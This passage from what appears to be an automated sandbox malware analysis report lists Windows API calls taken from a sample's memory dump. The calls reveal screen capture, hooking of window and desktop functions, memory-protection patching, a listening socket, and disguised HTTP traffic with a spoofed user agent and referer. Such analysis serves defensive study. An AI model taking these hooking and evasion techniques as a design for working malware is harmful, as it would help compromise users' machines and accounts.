                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 453615576-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 01311278
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0131128E
                                                                                                                                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 013112A8
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 013112B3
                                                                                                                                                                                                              • bind.WS2_32(00000000,?,00000010), ref: 013112CB
                                                                                                                                                                                                              • listen.WS2_32(00000000,00000005), ref: 013112D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: bindclosesockethtonslistensetsockoptsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4126956815-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F998D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F9994
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 012F99AF
                                                                                                                                                                                                              • send.WS2_32(?,?,00000000,00000000), ref: 012F99C0
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 012F99D9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heaprecv$FreeProcesssend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2415998009-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(00000000,00000000), ref: 012ECD58
                                                                                                                                                                                                              • IsIconic.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECFCE), ref: 012ECD63
                                                                                                                                                                                                                • Part of subcall function 012EC950: IsWindow.USER32(?,774D30D0,7707BCB0,774D3050), ref: 012EC96D
                                                                                                                                                                                                                • Part of subcall function 012EC950: IsWindowVisible.USER32(?), ref: 012EC97C
                                                                                                                                                                                                                • Part of subcall function 012EC950: GetWindowRect.USER32(?,?), ref: 012EC9B9
                                                                                                                                                                                                                • Part of subcall function 012EC950: GetClassLongA.USER32(?,000000E6), ref: 012EC9C2
                                                                                                                                                                                                                • Part of subcall function 012EC950: PrintWindow.USER32(?,?,00000000), ref: 012EC9D5
                                                                                                                                                                                                                • Part of subcall function 012EC950: RedrawWindow.USER32(?,00000000,00000000,00000485,?,?), ref: 012EC9FB
                                                                                                                                                                                                                • Part of subcall function 012EC950: CreateRectRgn.GDI32(?,?,?,?), ref: 012ECA11
                                                                                                                                                                                                                • Part of subcall function 012EC950: GetWindowRgn.USER32(?,00000000), ref: 012ECA1B
                                                                                                                                                                                                                • Part of subcall function 012EC950: OffsetRgn.GDI32(00000000,?,?), ref: 012ECA35
                                                                                                                                                                                                                • Part of subcall function 012EC950: SelectClipRgn.GDI32(?,00000000), ref: 012ECA40
                                                                                                                                                                                                                • Part of subcall function 012EC950: BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 012ECA69
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000038), ref: 012ECD8C
                                                                                                                                                                                                                • Part of subcall function 012ECBF0: GetWindowRect.USER32(012ECD24,00000000,012ED21D,7707BCB0), ref: 012ECBFF
                                                                                                                                                                                                                • Part of subcall function 012ECBF0: GetWindowLongA.USER32(012ECD24,000000F0,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECD24), ref: 012ECC19
                                                                                                                                                                                                                • Part of subcall function 012ECBF0: GetScrollBarInfo.USER32(012ECD24,000000FA,?), ref: 012ECC34
                                                                                                                                                                                                                • Part of subcall function 012ECBF0: GetScrollBarInfo.USER32(012ECD24,000000FB,0000003C), ref: 012ECC61
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005,00000001,00000000,00000000), ref: 012ECDAD
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012ECDB0
                                                                                                                                                                                                                • Part of subcall function 012ECCE0: memset.MSVCRT(?,00000000,00000038,7707BCB0,00000000,77074A40), ref: 012ECD11
                                                                                                                                                                                                                • Part of subcall function 012ECCE0: GetWindow.USER32(012ED21D,00000005,00000001,00000000,012ED21D,7707BCB0,00000000,77074A40), ref: 012ECD2C
                                                                                                                                                                                                                • Part of subcall function 012ECCE0: GetWindow.USER32(00000000), ref: 012ECD2F
                                                                                                                                                                                                                • Part of subcall function 012ECCE0: GetWindow.USER32(012ED21D,00000003,?,?,?,?,?,?,?,?,?,?,?,?,012ED21D,00000000), ref: 012ECD3A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Rect$InfoLongScrollmemset$ClassClipCreateIconicOffsetPrintRedrawSelectVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1230479295-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 01302B5E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 01302B83
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 01302B95
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileModuleNamememset
                                                                                                                                                                                                              • String ID: \clmain.exe
                                                                                                                                                                                                              • API String ID: 350293641-582869414
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 012EBC67
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 012EBC72
                                                                                                                                                                                                                • Part of subcall function 012ED970: GetComputerNameA.KERNEL32(0132F588,?,774CF550,775B7390,774D0A60,?,?,012F76EC), ref: 012ED987
                                                                                                                                                                                                                • Part of subcall function 012ED970: lstrlenA.KERNEL32(0132F588,?,?,012F76EC), ref: 012ED992
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F5A0,MSCTF.Shared.MAPPING.%x,?,?,?,012F76EC), ref: 012ED9D2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F54C,MSCTF.Shared.MAPPING.%x,774D0A60,?,?,?,012F76EC), ref: 012ED9E2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F5DC,MSCTF.Shared.MAPPING.%x,?,?,?,?,012F76EC), ref: 012ED9F2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F670,MSCTF.Shared.MUTEX.%x,?,?,?,?,?,012F76EC), ref: 012ED9FF
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F630,MSCTF.Shared.MUTEX.%x,774D0A60,?,?,?,?,?,012F76EC), ref: 012EDA0C
                                                                                                                                                                                                              • RegisterWindowMessageA.USER32(9e2b3b2da), ref: 012EBC87
                                                                                                                                                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,0132F5A0), ref: 012EBCB0
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,0132F670), ref: 012EBCC3
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,0132F630), ref: 012EBCDA
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 012EBCF6
                                                                                                                                                                                                              • Sleep.KERNEL32(000000C8), ref: 012EBD06
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012EBD0E
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 012EBD27
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 012EBD2E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,9e2b3b2da), ref: 012EBD44
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EBD70
                                                                                                                                                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,0132F54C), ref: 012EBD7E
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EBD91
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 012EBDC8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012EBDDC
                                                                                                                                                                                                              • Sleep.KERNEL32(000000C8), ref: 012EBDE7
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012EBDF4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EBDFF
                                                                                                                                                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,0132F54C), ref: 012EBE0D
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EBE20
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012EBE35
                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,0132F5DC), ref: 012EBE43
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 012EBE4E
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 012EBE62
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefWindowProcW), ref: 012EBE9C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefWindowProcA,00000000,Function_0000AE10,0132EBAC), ref: 012EBEBC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefDlgProcW,00000000,Function_0000AE90,0132EBA4), ref: 012EBEDC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefDlgProcA,00000000,Function_0000AF10,0132EB40), ref: 012EBEFC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefFrameProcW,00000000,Function_0000AFA0,0132EB48), ref: 012EBF1C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefFrameProcA,00000000,Function_0000B020,0132EBA8), ref: 012EBF3C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefMDIChildProcW,00000000,Function_0000B0A0,0132EB80), ref: 012EBF5C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DefMDIChildProcA,00000000,Function_0000B120,0132EB94), ref: 012EBF7C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CallWindowProcW,00000000,Function_0000B1A0,0132EB68), ref: 012EBF9C
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,774CF550,00000000,7706BD50,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA578
                                                                                                                                                                                                                • Part of subcall function 012FA540: memcpy.MSVCRT(?,?,00000000,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA5A0
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(00000000,?,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA635
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(?,00000000,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA64A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CallWindowProcA,00000000,Function_0000B220,0132EB9C), ref: 012EBFBC
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(?,00000000,012F98DA,?,?,?,00000000,00000000,?,?,?,?,?,?,012F98DA,00000000), ref: 012FA67A
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(?,00000000,012F98DA,?,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA686
                                                                                                                                                                                                                • Part of subcall function 012FA540: GetCurrentProcess.KERNEL32(00000000,00000000,774CF550,00000000,7706BD50,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA697
                                                                                                                                                                                                                • Part of subcall function 012FA540: FlushInstructionCache.KERNEL32(00000000,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA69E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterClassW,00000000,Function_0000B2A0,0132EB2C), ref: 012EBFDC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterClassA,00000000,Function_0000B360,0132EB54), ref: 012EBFFC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterClassExA,00000000,Function_0000B3F0,0132EB8C), ref: 012EC01C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterClassExW,00000000,Function_0000B4E0,0132EB30), ref: 012EC03C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PeekMessageW,00000000,Function_0000B480,0132EB84), ref: 012EC05C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PeekMessageA,00000000,Function_0000B9C0,0132EBA0), ref: 012EC07C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,OpenInputDesktop,00000000,Function_0000BA30,0132EB50), ref: 012EC09C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,OpenDesktopA,00000000,Function_0000B540,0132EB28), ref: 012EC0BC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,OpenDesktopW,00000000,Function_0000B570,0132EB88), ref: 012EC0DC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SwitchDesktop,00000000,Function_0000B5D0,0132EB98), ref: 012EC0FC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MessageBeep,00000000,Function_0000B630,0132EB58), ref: 012EC11C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlashWindowEx,00000000,Function_0000B6F0,0132EB3C), ref: 012EC13C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetCursorPos,00000000,Function_0000B710,0132EB44), ref: 012EC15C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetCursorPos,00000000,Function_0000B760,0132EB90), ref: 012EC17C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMessagePos,00000000,Function_0000B7A0,0132EB60), ref: 012EC19C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetCapture,00000000,012EB7F0,0132EB5C), ref: 012EC1BC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseCapture,00000000,Function_0000B820,0132EB6C), ref: 012EC1DC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetCapture,00000000,012EB920,0132EB70), ref: 012EC1FC
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Winmm.dll,00000000,00000000,00000000,012EBAA0,0132EB4C), ref: 012EC223
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PlaySoundW), ref: 012EC235
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PlaySoundA,00000000,Function_0000B670,0132EB34), ref: 012EC255
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,sndPlaySoundW,00000000,Function_0000B650,0132EB7C), ref: 012EC275
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,sndPlaySoundA,00000000,Function_0000B6B0,0132EB38), ref: 012EC295
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Kernel32.dll,00000000,00000000,00000000,Function_0000B690,0132EB64), ref: 012EC2B4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Beep), ref: 012EC2C0
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Gdi32.dll,00000000,00000000,00000000,Function_0000B6D0,0132EB78), ref: 012EC2DF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDIBitsToDevice), ref: 012EC2EB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$FileOpen$Virtualwsprintf$LibraryLoadMutexProtect$CurrentMappingObjectView$HandleInformationProcessReleaseSingleSleepThreadWait$AllocCacheCloseComputerCountCreateDesktopEventFlushHeapInstructionMessageNameRegisterTickUserWindowlstrcmpilstrlenmemcpy
                                                                                                                                                                                                              • String ID: 9e2b3b2da$Beep$CallWindowProcA$CallWindowProcW$DefDlgProcA$DefDlgProcW$DefFrameProcA$DefFrameProcW$DefMDIChildProcA$DefMDIChildProcW$DefWindowProcA$DefWindowProcW$FlashWindowEx$Gdi32.dll$GetCapture$GetCursorPos$GetMessagePos$Kernel32.dll$MessageBeep$OpenDesktopA$OpenDesktopW$OpenInputDesktop$PeekMessageA$PeekMessageW$PlaySoundA$PlaySoundW$RegisterClassA$RegisterClassExA$RegisterClassExW$RegisterClassW$ReleaseCapture$SetCapture$SetCursorPos$SetDIBitsToDevice$SwitchDesktop$Winmm.dll$sndPlaySoundA$sndPlaySoundW$user32.dll
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF,00000000,012E6E36,00000000), ref: 012F4AED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000017,00000000,012E6E36,00000000), ref: 012F4B27
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F4B2E
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000017), ref: 012F4B3E
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,012E6E36,00000004,00000000,012E6E36,00000000), ref: 012F4B5D
                                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 012F4BC2
                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,012E6E36,00000050,00000000,00000000,00000003,00000000,00000001), ref: 012F4BE1
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 012F4C19
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 012F4C4A
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 012F4C5E
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,Content-Type: multipart/form-data; boundary=---------------------------%s,01339C60), ref: 012F4C7C
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 012F4C94
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 012F4CAA
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 012F4CCD
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 012F4D05
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 012F4D2C
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,012E6E36,00000004,00000000), ref: 012F4D4D
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 012F4D66
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 012F4D70
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001010), ref: 012F4D83
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F4D86
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00001010), ref: 012F4D9E
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 012F4DBB
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F4DDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012F4DEC
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012F4DFB
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012F4E0B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F4E14
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F4E1B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F4E2C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F4E33
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F4E41
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F4E44
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F4E51
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F4E54
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000004), ref: 012F4E6A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F4E7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • GET, xrefs: 012F4BF5
                                                                                                                                                                                                              • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 012F4C6B
                                                                                                                                                                                                              • HTTP/1.0, xrefs: 012F4C11
                                                                                                                                                                                                              • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 012F4BBD
                                                                                                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 012F4C42
                                                                                                                                                                                                              • S:(ML;;NRNWNX;;;LW), xrefs: 012F4D27
                                                                                                                                                                                                              • POST, xrefs: 012F4BFE, 012F4C17
                                                                                                                                                                                                              • Referer: http://www.google.com, xrefs: 012F4C58
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileHttpProcess$Request$Security$DescriptorFreeHeadersInternetmemset$AllocHandleInfoOpenValidate$CloseConnectConvertCreateInformationLocalLockNamedPointerQueryReadSaclSendStringUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                              • String ID: Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1453177232-3558862663
                                                                                                                                                                                                              • Opcode ID: 9d17faf2cca54e8b16cb5ee4ea0a9684f0732f9b58b358f8fd1e7af9760f7563
                                                                                                                                                                                                              • Instruction ID: aa61e44dfaa2082a52b3000d86c439ad0540ff082fe83f078c10359a03ae88a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d17faf2cca54e8b16cb5ee4ea0a9684f0732f9b58b358f8fd1e7af9760f7563
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CD16271A10256ABEB30AF659C49FEF7B6CAF48714F10412DFB05E61C4DAB4D640CBA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,774D3490), ref: 012E419D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012E41A0
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000C10), ref: 012E41B4
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012E4224
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4232
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E4235
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4242
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E4245
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000BED), ref: 012E425D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012E4260
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000BED), ref: 012E4270
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012E428A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E4297
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E429A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E42AB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E42AE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000A9), ref: 012E42DA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012E42DD
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,-000000A9), ref: 012E42F4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 012E4346
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E434D
